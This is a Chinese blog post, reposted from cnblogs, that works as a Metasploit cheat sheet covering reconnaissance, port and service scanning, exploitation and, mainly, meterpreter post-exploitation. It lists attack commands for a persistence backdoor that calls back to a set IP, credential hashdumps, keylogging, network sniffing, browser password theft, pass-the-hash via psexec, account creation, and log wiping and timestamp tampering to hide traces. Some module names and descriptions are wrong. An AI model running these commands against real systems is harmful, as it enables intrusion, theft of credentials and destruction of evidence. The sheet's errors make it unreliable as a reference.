Metaspolit使用简介

信息收集阶段


Whois信息收集

msf auxiliary > whois baidu.com

域名信息查询阶段

msf auxiliary > nslookup www.baidu.com
msf auxiliary > dig @114.114.114.114 www.baidu.com 


主机端口探测阶段

直接使用PING命令探测连通性
ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep
msf > set RHOSTS 1.1.1.0/24
msf > set THREADS 50
msf > run

使用NMAP探测
msf > nmap command

服务扫描打点

telnet服务:use auxiliary/scanner/telnet/telnet_version
ssh服务:use auxiliary/scanner/ssh/telnet_version
Oracle服务:use auxiliary/scanner/oracle/tnslsnr_version
http服务:use auxiliary/scanner/http/open_proxy

口令探测

ssh服务:use auxiliary/scanner/ssh/telnet_login
ftp服务:use auxiliary/sniffer/psnuffle

漏洞扫描阶段


那是nessus openVAS等的天下,可以利用PostgreSQL数据库进行联动

MSF框架下的WEB渗透


为什么不用burpsuite呢,用burpsuite更好
还有SQLMAP啊,还有好多其他的啊,啦啦啦

漏洞利用阶段


选择合适的漏洞利用payload和攻击脚本即可

use xxx
set payload xxx

强大的meterpreter


meterpreter > background 后台运行meterpreter
meterpreter > sessions 列出session,选择交互session的话 使用session -i  x
msterpreter > shell 
msterpreter > cat xxxxx 查看文件
msterpreter > getwd/getlwd  获取当下路径
msterpreter > upload xxx.exe c:  上传文件或文件夹
msterpreter > download c:\"Program Files"\xxx\xxx\xxx  ./  下载文件
msterpreter > edit 使用vi编辑器编辑目标机上的文件
msterpreter > search 搜索目标上的文件
msterpreter > ipconfig 查看网络信息
msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 将目标机的3389 转发到本地1234端口
msterpreter > route 查看目标机的路由信息
msterpreter > ps  查看进程表
msterpreter > migrate 转移shell到进程
msterpreter > execute -H -f cmd.exe 隐藏执行cmd
msterpreter > execute -H -i -f cmd.exe 可以与cmd交互了 -m 参数直接在内存执行供给端的可执行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt" 
msterpreter > getpid 获取当前会话所在进程的pid
msterpreter > getuid /whoami 获取自己是谁
msterpreter > sysinfo  查看系统信息
msterpreter > kill 杀掉进程
msterpreter > shutdown关机
msterpreter > hashdump 获取windows 的hash口令
msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141
msterpreter > run metsvc #吧31337端口打开监听meterpreter
msterpreter > run getgui -u metaspolit -p meterpreter 添加账户metaspolit 密码meterpreter
msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc
msterpreter > getsystem 提权
msterpreter > run post/windows/gather/dumplinks 获取最近处理的文档
msterpreter > run post/windows/gather/enum_applications 获取安装的程序
msterpreter > keyscan_start 键盘记录
msterpreter > keyscan_dump 
msterpreter > keyscan_stop 关闭
msterpreter > use sniffer #网络监听获取密码
msterpreter > sniffer_interface
msterpreter > sniffer_start 1
msterpreter > sniffer_dump 1 /tmp/xxx.pcap 
msterpreter > sniffer_stop 1
msterpreter > run post/windows/gather/enum_ie 浏览器获取密码
msterpreter > run windows/gather/smart_hashdump 获取系统口令
msterpreter > run get_local_subnets 添加路由 
msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print 
msf > use exploit/windows/smb/psexec
msf > set RHOST RPORT LHOST ...
msf > set SMBPass hash值
msf > exploit
msterpreter > clearev 删除日志
msterpreter >timestomp 停止修改文件属性的时间记录
原文地址:https://www.cnblogs.com/KevinGeorge/p/9183122.html